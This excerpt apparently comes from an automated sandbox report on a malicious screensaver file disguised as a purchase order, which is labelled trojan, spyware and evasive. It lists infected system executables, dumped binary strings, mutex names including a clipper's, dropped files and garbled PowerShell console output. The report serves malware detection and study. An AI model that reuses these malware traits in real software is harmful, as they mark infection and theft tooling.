                  Source: armsvc.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SearchIndexer.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: WmiApSrv.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: aspnet_state.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: mscorsvw.exe1.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: mscorsvw.exe2.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: dllhost.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ehrecvr.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ehsched.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: FXSSVC.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: elevation_service.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ieetwcollector.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: maintenanceservice.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msdtc.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msiexec.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: perfhost.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Locator.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: snmptrap.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: sppsvc.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_NOT_PAGED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: vds.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: VSSVC.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: wmpnetwk.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: wbengine.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: OSE.EXE.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: PO#_1100015533.scrStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: hVVSnrrP.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: VSSVC.exe.11.drBinary string: ::StringCchPrintf( wszDevicePath, ARRAYSIZE(wszDevicePath), L"%s\\Device\\Harddisk%d\\Partition%d\\", L"\\?\GLOBALROOT", dwDeviceNumber, pCurPtnEx->PartitionNumber )
                  Source: VSSVC.exe.11.drBinary string: DynPack::InitializepInPackIdpDynDiskListGetLastError() == ERROR_NOT_FOUND%lu::StringCchPrintf( ARRAY_COUNT_PARAM(wszDiskNumber), L"%lu", pDiskInfo->DeviceNumber )VSS_E_ASRERROR_DYNAMIC_VHD_NOT_SUPPORTEDpDynVolListPackIdPackNameIsOnlineNumDynDisksNumDynVolsIsCriticalMediaERROR_INSUFFICIENT_BUFFERpDiskListDynDiskDynVolumeDynPack::BuildXMLNodeppNodeOutERROR_INVALID_PARAMETERDynPack::GetPackIdpguidPackIdDynDisk::InitializeGuidIsMissingPublicOffsetPublicLengthDeviceNumberDynDisk::BuildXMLNodeDynDisk::TraceQueryDiskInfoBufferpQueryDiskInfoBufferSafeStrConvertGuidString(&pQueryDiskInfoBuffer->GptDiskId, ARRAY_COUNT_PARAM(wszGuidString))TraceVmVolumeLayoutpVolumeLayoutSafeStrConvertGuidString(&pNextExtentLayout->DiskId, ARRAY_COUNT_PARAM(wszGuidString))TraceQueryVolumeInfoBufferpQueryVolumeInfoBufferpVolGuidSafeStrConvertGuidString(pVolGuid, ARRAY_COUNT_PARAM(wszGuidString))DynVolume::InitializepVolIdSafeStrConvertGuidString(pVolId, ARRAY_COUNT_PARAM(wszGuidString))pDynPlexListNumPlexesHasPartitionsIsBootIsSystemNumSymbolicNamesVolumeLengthDynPlexDynVolume::BuildXMLNodeERROR_INVALID_DATADynPlex::InitializepPlexLayoutpDynMemberListNumMembersTypeInterleaveLengthStatusPercentageIsCurrentBootIsCurrentSystemDynMemberDynPlex::BuildXMLNodeDynMember::InitializepMemberLayoutpDynExtentListNumExtentsSizeDynExtentDynMember::BuildXMLNodeDynExtent::InitializepExtentLayoutDiskIdOffsetLengthDynExtent::BuildXMLNodepwszDeviceNameSYSTEM\CurrentControlSet\Control\MiniNTGetRdisk0DeviceNumberpdwDeviceNumber\\?\GLOBALROOT\arcname\multi(0)disk(0)rdisk(0)hDiskDoStorageIoctlCall(hDisk, IOCTL_STORAGE_GET_DEVICE_NUMBER, NULL, 0, (void **)&pStorageDeviceNumber)AsrGetSystemVolumeGlobalRootPathpwszVolumeAsrGetSystemVolumeDevPath(wszDevicePath, ARRAYSIZE(wszDevicePath) )StringCchPrintf( pwszVolume, cchVolume, L"\\\\?\\GLOBALROOT%s", wszDevicePath )AsrGetSystemVolumeDevPathntStatuspSysInfoNtQuerySystemInformation( SystemSystemPartitionInformation, pSysInfo, cbRequiredSize, &cbRequiredSize)::StringCchCopyN( pwszVolume, cchVolume, pSysInfo->SystemPartition.Buffer, (pSysInfo->SystemPartition.Length)/sizeof(WCHAR) )AsrpGetMorePartitionInfopDriveLayoutExppPartitionTableERROR_UNSUPPORTED_TYPEGetRdisk0DeviceNumber(&dwRDisk0DevNumber)AsrGetSystemVolumeGlobalRootPath( wszSysVolPath, ARRAYSIZE(wszSysVolPath) )hSystemVolumeDoVolumeIoctlCall(hSystemVolume, IOCTL_VOLUME_GET_VOLUME_DISK_EXTENTS, NULL, 0, (void **)&pSystemVolExtents, NULL)GetBootVolumeGuidName(&pwszBootVolGuidName)hBootVolumeDoVolumeIoctlCall(hBootVolume, IOCTL_VOLUME_GET_VOLUME_DISK_EXTENTS, NULL, 0, (void **)&pBootVolExtents, NULL)pPartitionTableDiskBuildDevicePartitionPath( dwDeviceNumber, pCurPtnEx->PartitionNumber, FALSE, ARRAY_COUNT_PARAM(wszDevicePath) )\\?\GLOBALROOT%s\Device\Harddisk%d\Partition%d\::StringCchPrintf( wszDevicePath, ARRAYSIZE(wszDevicePath), L"%s\\Device\\Harddisk%d\\Partition%d\\", L"\\?\GLOBALROOT", dwDeviceNumber, pCurPtnEx->PartitionNumber )GetFileSytemType( wszFsName, &pPartitionTable[dwIndex].FileSystemTy
                  Source: VSSVC.exe.11.drBinary string: DiskListMarkOfflineDisksDeviceIoControl( hDisk, IOCTL_DISK_GET_DISK_ATTRIBUTES, NULL, 0, &DiskAttributes, sizeof(DiskAttributes), &dwBytesReturned, NULL)DiskBusesAsrVhdAsrSystem::BuildXmlNodesAsrSystem::_BuildVersionXmlNodeAsrVersionAsrSystem::_BuildSystemXmlNode%d.%dMachineNamePlatformFirmwareTypeOSVersionBootWinDirectoryBootSysDirectoryAutoExtendSKUAsrSystem::_BuildDiskBusesXmlNodeBusTypeKeyNumBusTypeAsrSystem::_BuildDisksXmlNodeNumMbrDisksNumGptDisksMbrDiskGptDiskAsrSystem::_BuildMbrDiskXmlNodeNumPartitionsPartitionTableSizeBusKeyMbrSignatureBytesPerSectorSectorsPerTrackTracksPerCylinderNumCylindersMediaTypeDiskSizeIsExcludedIsSharedMbrPartitionAsrSystem::_BuildGptDiskXmlNodeGptGuidERROR_NOT_ENOUGH_MEMORYMaxPartitionGptPartitionAsrSystem::_BuildMbrPartitionXmlNodePartitionIndexPartitionFlagBootFlagPartitionTypeFileSystemTypePartitionOffsetPartitionLengthAsrSystem::_BuildGptPartitionXmlNodePartitionIDGptAttributesGptNameAsrSystem::_BuildVhdFileXmlNodeVhdFileInfoVolumeNameRelativeFilePathBlockSizeFlagsSequenceVirtualDiskAsrSystem::_BuildVirtualDiskXmlNodeNumFilesAsrSystem::_BuildAsrVhdXmlNodeNumDisks2.0AsrSystem::AppendVolumeSymbolicNamesIntoXmlNodepParentNodepdwNumAddedVolumeMountPointAsrSystem::BuildVolumeSymbolicNameXmlNodepwszVolumeNameSymbolicNameAsrSystem::GetSifDiskBySifDevNumppSifDiskAsrSystem::IsCriticalDiskDiskListMarkClusteredDisksdwRetAsrSystem::InitializeForBackupppmwszCriticalVolumesm_pwszVersionStringAsrpInitSystemInformation(&m_SystemInfo, bEnableAutoExtend)DiskListInitialize(&m_pDiskListHead)DiskListMarkClusteredDisks( m_pDiskListHead )DiskListPopulateLayoutInfo( &m_pDiskListHead, &dwMaxDeviceNumber)DiskListFreeNonFixedMedia(&m_pDiskListHead)DiskListMarkOfflineDisks( m_pDiskListHead )AsrpMarkCriticalPartitions(m_pDiskListHead, ppmwszCriticalVolumes)AsrpMarkCriticalDisks(m_pDiskListHead, *ppmwszCriticalVolumes, dwMaxDeviceNumber)AsrpMarkExclusionDisksForBackup(m_pDiskListHead, rgIncludedDisks, cIncludedDisks)AsrpIsSupportedConfiguration(m_pDiskListHead, &m_SystemInfo)AsrpMarkExclusionDisksForBackupEnablePrivilegeLogEventpguidToConvert && pwszGuidStringOut%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2xppmwszMwszpwszNewStringToAddpmwszNewMwszpwszStringOutpIoctlOutputBufferdwLastErrorpDriveLayoutDiskTraceDriveLayoutSafeStrConvertGuidString(&pDriveLayoutEx->Gpt.DiskId, ARRAY_COUNT_PARAM(wszGuidString))SafeStrConvertGuidString(&pPartitionInfo->Gpt.PartitionId, ARRAY_COUNT_PARAM(wszGuidString))GetDriveTypeByHandlepuiDriveTypeOut::NtQueryVolumeInformationFile( hDisk, &IoStatusBlock, &DeviceInfo,sizeof(DeviceInfo), FileFsDeviceInformation)DiskBuildDevicePartitionPathpwszDevicePathOut%s\Device\Harddisk%d\Partition%dDiskForceDriversSyncppwszSignatureOutpwszSignature::StringCchPrintf(pwszSignature, cchSignature, L"0x%x", pDriveLayout->Mbr.Signature)vsstrace.dll
                  Source: wbengine.exe.11.drBinary string: YK _hImpersonationToken != INVALID_HANDLE_VALUEd:\w7rtm\base\stor\blb\blbimg\blbimg.cxxReadHandle != INVALID_HANDLE_VALUEWriteHandle != INVALID_HANDLE_VALUEpdwFlagsFveGetStatusWwszDeviceName%ws\%wsExtentLength > 0pCurrentListEntry->Length > 0pbRecomputeNeededpBadClusExtentsBeforeRecoverypBpb\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy{\System Volume Information\*{3808876B-C176-4e48-B7AE-04046E6CC752}\System Volume Information\readBuffer != NULL{{3808876B-C176-4e48-B7AE-04046E6CC752}!IsListEmpty(&diffsInSource)\pagefile.sys\hiberfil.sysBackupFileNameUniqueIdWin32ErrorCodeIoState[CurrentBuffer] == BLBIMGI_IO_STATE_WRITINGoffset[i] < volumeSizet.QuadPart < restoreContext->VolumeSize\\?\GLOBALROOT\Device\BlbControlImpersonationToken != INVALID_HANDLE_VALUEoutputBuf->MultiSzLength % sizeof (WCHAR) == 0.\%ws_compressionReadAheadBufferOverlapped.hEventd:\w7rtm\base\stor\blb\blbimg\backfile.cxx_handle != NULL_isCompactForm == FALSE_handle == NULLblockNumberOnDisk != 0xFFFFFFFFdiskOffset >= volumeStartOffsetvolumeBlockOffsetBitLength >= bitsInvolumeStartOffset_batRelativeVolumePointer >= BLBIMGF_SECTOR_SIZE!_isCompactForm_batList[diskBlockOffset] != 0xFFFFFFFFdiskBlockOffset < _numberOfBatEntriesoffsetInDiskBlock % BLBIMGI_BYTES_PER_BLOCK == 0prevBlock >= 0(length == BLBIMGI_BYTES_PER_BLOCK) || isLastBlockInSource_currentFilePointer < _maximumFileSize!_isReadInitialized_currentFileSize >= _existingFileSizebitsInvolumeStartOffset < BLBIMGI_BITS_PER_BAT_BLOCKbisMasterBootRecord_currentFilePointer <= _maximumFileSize_newVhdFormatconectixvsimcxsparsewriteOffSet - Length + _lastBlockSize == _volumeSizereadOffset.QuadPart%BLBIMGF_SECTOR_SIZE == 0readOffset.QuadPart/BLBIMGF_SECTOR_SIZE >= _firstBlockSectorreadOffset.QuadPart/BLBIMGF_SECTOR_SIZE <= _maximumFileSizelen == _sectorSized:\w7rtm\base\stor\blb\blbimg\snapvol.cxx_currentBitNumber == 0_currentBlockListNumber < _batBlockListLength_batBlockList[_currentBlockListNumber] != 0xFFFFFFFFbytesRead == lensplitReadulReadSize > 0_blockBitmap.SizeOfBitMap >= 1.
                  Source: VSSVC.exe.11.drBinary string: Element\Device\HarddiskVolume
                  Source: VSSVC.exe.11.drBinary string: VssVolumeHasParentVolumeVOLUMECd:\w7rtm\base\stor\vss\modules\volume\volume.cxxOpening volume %sNo VHDs are presently surfacedGetStorageDependencyInformation(%s, NULL) failed to get required buffer size, %#xwhile calling GetStorageDependencyInformation<null>VHD volume %s is surfaced from a remote machine. Parent volume path: %sStringCchPrintf - volume name: %sStringCchCopy - volume guid name: %sParentIsPhysical: %s\??\Volume{pNewLinkpMpIsVirtualVolumepbVirtualwszVolumewszVolumeNameWithoutTrailingSlashAsrVhd::GetDeviceDependencyInformation( wszVolumeNameWithoutTrailingSlash, TRUE, STORAGE_DEPENDENCY_INFO_VERSION_1, &pVhdInfo )BuildStateInfoERROR_PRIVILEGE_NOT_HELD::StringCchCopyN(ARRAY_COUNT_PARAM(szVolumeGuid), pMp->pVolumeGuid, cchGuid)::StringCchCopy(ARRAY_COUNT_PARAM(szFsName), pMp->szFsName)::StringCchCopy(ARRAY_COUNT_PARAM(szLabel), pMp->szLabel)pNewVolume::StringCchCopyN(ARRAY_COUNT_PARAM(pNewVolume->szGuid), pMp->pVolumeGuid, pMp->cchVolumeGuid)::StringCchCopy(ARRAY_COUNT_PARAM(pNewVolume->szFsName), szFsName)::StringCchCopy(ARRAY_COUNT_PARAM(pNewVolume->szLabel), szLabel)::StringCchCopyN(ARRAY_COUNT_PARAM(pNewVolume->szDosPath), pCurrentLink->pLink, pCurrentLink->cchLink)pNewMedia::StringCchCopyN(ARRAY_COUNT_PARAM(pNewMedia->szVolumeGuid), pMp->pVolumeGuid, pMp->cchVolumeGuid)::StringCchCopyN(ARRAY_COUNT_PARAM(pNewMedia->szDevicePath), pMp->pDeviceName, pMp->cchDeviceName)::StringCchCopyN(ARRAY_COUNT_PARAM(pNewMedia->szDosPath), pCurrentLink->pLink, pCurrentLink->cchLink)pwszVolumeGuid\\.\MountPointManager!pMountPointIn(!hMountMgr || INVALID_HANDLE_VALUE == hMountMgr)!pMountPointsOutbResult(!cbMountPoints || !bResult)CreateXmlDocumentppwszOutXmlDocAsrSifVersionpwszXmlDocAsrPerformBackupppwszXmlDocOutSeSystemEnvironmentPrivilegeERROR_BAD_FORMATMwszStringAppend(ppmwszSelectedCriticalVolumes, pwszBootVolGuidName)VSS_E_ASRERROR_SYSTEM_PARTITION_HIDDENMwszStringAppend(ppmwszSelectedCriticalVolumes, pwszSysVolGuidName)MwszStringAppend( ppmwszSelectedCriticalVolumes, wszWinReVolumeGuid )ERROR_OUTOFMEMORYasr_ldm.InitializeForBackup( &asr_sys, *ppmwszSelectedCriticalVolumes, rgIncludedDisks, cIncludedDisks )pPackIdAsrLdm::InitializeForBackuppAsrSys\Device\VolMgrControlDevicePathToWin32Path(DD_VOLMGR_CONTROL_DEVICE_NAME, ARRAY_COUNT_PARAM(wszVolMgmtCtlPath))DoVdsIoctlCall(hVdsDriver, IOCTL_VOLMGR_ENUM_PACKS, NULL, 0, (void **)&pOutBuffer)pPackListhrE_OUTOFMEMORYE_FAILNumPackspXmlDocAsrLdmDynPackAsrLdm::BuildXmlNodespTopNodem_pPackList[ulPackIndex].GetPackId(&guidPackId)ERROR_NOT_FOUNDSystemAsrWriteXmlToSifFilepwszXmlFilenamep
                  Source: wbengine.exe.11.drBinary string: >`WindowsBackupLinksLink_{47b7fa87-ce42-48ff-8b18-2f1088121503}Child_{47b7fa87-ce42-48ff-8b18-2f1088121503}\\?\Globalroot\Device\Harddisk%lu\Partition1\a
                  Source: VSSVC.exe.11.drBinary string: \Device\Harddisk%lu\Partition%lu
                  Source: wbengine.exe.11.drBinary string: !m_bAsyncInProgressd:\w7rtm\base\stor\blb\engine\service\engine.cpp!m_pAsyncRefg_cInitialized == 0SeBackupPrivilegeSeRestorePrivilegefveapi.dllm_pAsyncRef == NULL && m_eOperationType == BLB_OT_UNDEFINEDcVolume < cMaxVolumecTarget < cMaxTargetm_pAsyncHelper == NULL && m_pAsyncRef == NULL*ppAsync != NULLm_bIsRecoveryStartedBlbMountedVolumesBlbMountedVolumeFile%d\\?\GLOBALROOT\Device\HarddiskVolumeFile%dm_numNetworkShareVolumes > 0NOT currOffset < bufSizeOutm_pAsyncHelper!m_pAsyncHelperShowWarningwszFileSpecsXMLpTemplatepbAllCriticalpbSystemStatepTargetpMedia->m_eMediaType == BLB_MT_SHINY || pMedia->m_eMediaType == BLB_MT_REMOVABLEpCatBackupSet->m_cTarget == 1Software\Policies\Microsoft\Windows\Backup\ClientSoftware\Policies\Microsoft\Windows\Backup\ServerDisableBackupToNetworkNoBackupToNetworkDisableBackupToDiskNoBackupToDiskDisableBackupToOpticalNoBackupToOpticalNoRunNowBackupOnlySystemBackupDisableSystemBackupUIRestoreTimeSoftware\Microsoft\Windows NT\CurrentVersion\SystemRestoreRestoreStatusResultguidBackupSetId != GUID_NULLcMedia > 0rgCatBackupSet[i].m_wszCurrentTargetNamem_pCatalogSystempTemplate->m_bIsScheduledTemplatepOldTemplate != NULLpNewTemplate != NULLpbstTypergBackupVolumesrgAllVolumesInfocBackupVolumecVolumeInfotk
                  Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winSCR@52/53@63/19
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\logF529.tmp
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrFile created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DATJump to behavior
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-68573a154f49b6deab63edc8-b
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeMutant created: NULL
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeMutant created: \BaseNamedObjects\Global\Multiarch.m0yv-68573a154f49b6de9ea72c54-b
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeMutant created: \Sessions\1\BaseNamedObjects\QFBxgKCGWQxTLytijuRedtoyKG
                  Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMutant created: \Sessions\1\BaseNamedObjects\Phoenix_Clipper_666
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-68573a154f49b6de-inf
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrFile created: C:\Users\user\AppData\Local\Temp\tmpB6F1.tmpJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....$.......,..........................................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....$.......,..........................................s..............%.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....$.......,..........................................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....$.......,..........................................s..............%.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....$.......,..........................................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....$.......,..........................................s..............%.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n.......$.......,..........................................s..............%.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....$.......,..........................................s..............%.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1....................................s..............%..... .......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....$.......,..........................................s..............%.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....$.......,..........................................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....$.......,...............&..........................s..............%.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.....9..........................s..............%.....$.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....$.......,...............E..........................s..............%.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....$.......,...............W..........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....$.......,...............c..........................s..............%.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s..............%.....2.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....$.......,..........................................s..............%.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....$.......,..........................................s....................l.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....$.......,..........................................s..............%.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....$.......,..........................................s..............%.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....$.......,..........................................s..............%.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................X..................................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................X..................................s..............'.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................X..................................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................X..................................s..............'.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................X.......)..........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................X.......6..........................s..............'.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n.......................X.......H..........................s..............'.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................X.......X..........................s..............'.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.X.......k..........................s..............'..... .......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................X.......w..........................s..............'.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................X..................................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................X..................................s..............'.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~................................s..............'.....$.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................X..................................s..............'.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................X..................................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................X..................................s..............'.............................Jump to behavior
